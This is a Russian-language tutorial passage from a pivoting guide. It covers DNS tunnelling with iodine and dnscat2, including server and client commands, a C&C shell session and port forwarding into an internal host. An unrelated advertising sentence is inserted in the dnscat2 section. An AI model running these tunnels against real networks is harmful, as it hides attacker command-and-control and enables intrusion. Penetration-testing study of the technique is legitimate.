Статьи

Руководство по pivoting. Часть 6

DNS-туннелирование
Если любой трафик WAN блокируется, а внешние имена узлов разрешены, то есть вероятность туннелирования трафика с помощью DNS-запросов. Вам нужен зарегистрированный домен, чтобы эта техника работала. Данное руководство может помочь вам с настройкой сервера имен.

Iodine
Если так случится, что вы получите root доступ к серверу, то можете попробовать iodine. Он работает почти как инструмент icmp-туннелирование — создает пару tun-адаптеров данных и тоннелей между ними как DNS-запросов. На стороне сервера:
iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
Сторона клиента:
iodine -f -P P@ssw0rd tunneldomain.com –r
Успешное соединение даст прямую видимость клиента по адресу 1.1.1.2. Обратите внимание, что этот метод туннелирования является довольно медленным. Лучше всего использовать сжатый соединение SSH через результирующий связь:
ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
Dnscat2
Dnscat2 устанавливает канал C&C через рекурсивные запросы DNS. Этот инструмент не требует прав root/administrator для доступа (работает как на Windows так и на Linux). Он также поддерживает перенаправление портов. Кстати, если вы хотите посмотреть онлайн квартиры в Болгарии по низким ценам — переходите по ссылке.

На стороне сервера:
ruby ./dnscat2.rb tunneldomain.com
Сторона клиента:
./dnscat2 tunneldomain.com
После того, как получите соединение со стороны сервера, можете просматривать активные сеансы с командой windows:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = tunneldomain.com [*]
1 :: command session (debian)
2 :: sh (debian) [*]
Для того, чтобы начать проброс портов, выберите команду сеанса с session -i :
dnscat2> session -i 1
New window created: 1
New window created: 1
history_size (session) => 1000
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command session (debian) 1>
Используйте команду listen [lhost:]lport rhost:rport для перенаправления порта:
command session (debian) 1> listen 127.0.0.1:8080 10.0.0.20:80
Это свяжет порт 8080 на машине атакующего и направит вперед все соединения на 10.0.0.20:80.

0 комментариев

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.